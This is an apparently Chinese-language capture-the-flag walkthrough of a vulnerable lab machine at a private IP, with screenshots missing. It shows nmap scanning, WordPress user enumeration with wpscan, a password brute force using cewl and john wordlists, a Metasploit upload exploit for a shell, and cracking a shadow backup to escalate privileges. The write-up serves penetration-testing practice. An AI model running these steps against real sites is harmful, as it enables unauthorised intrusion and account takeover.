按照之前的方法,但是这里是 dhcp 被注释掉了
把那些白的删掉,箭头指向的那一行的注释去掉
image.png
nmap -p- -A 192.168.149.196
image.png
ftp 匿名登录进去啥都没有
image.png
80 端口有个 apache 的默认页面
然后扫描目录扫出来一个 bull,访问是一个 wordpress 的博客,扫描一波,出来个用户名 bullywpscan --url http://192.168.149.196/bull/ -eu
image.png
然后爆破一下(字典用 cewl 获取页面上的内容)cewl -w words.txt -m 6 http://192.168.149.196/bull/
-m 这个参数指定的是长度john --wordlist=words.txt --rules --stdout > words-john.txt
john 处理一下,生成一些组合出来的
wpscan --url http://192.168.149.196/bull/ --passwords ./words-john.txt -U bully
然后用组合出来的字典跑出来 bully 账户密码为 Bighornedbulls
image.png
然后可以用 msf 直接来拿 shell
1 | use exploit/unix/webapp/wp_slideshowgallery_upload |
image.png
在 /var/www/html 目录下有个 flag
/tmp 目录下也有,同时还有个 shadow.bak
image.png
保存出来用 john 暴力跑一下,得到:
image.png
切换用户 heffer 在用户目录得到一个 flag
image.png
切换 minotaur 同样在用户目录得到一个 flag
用 sudo -l 查看一下发现可以用 sudo 执行任意的命令?
image.png
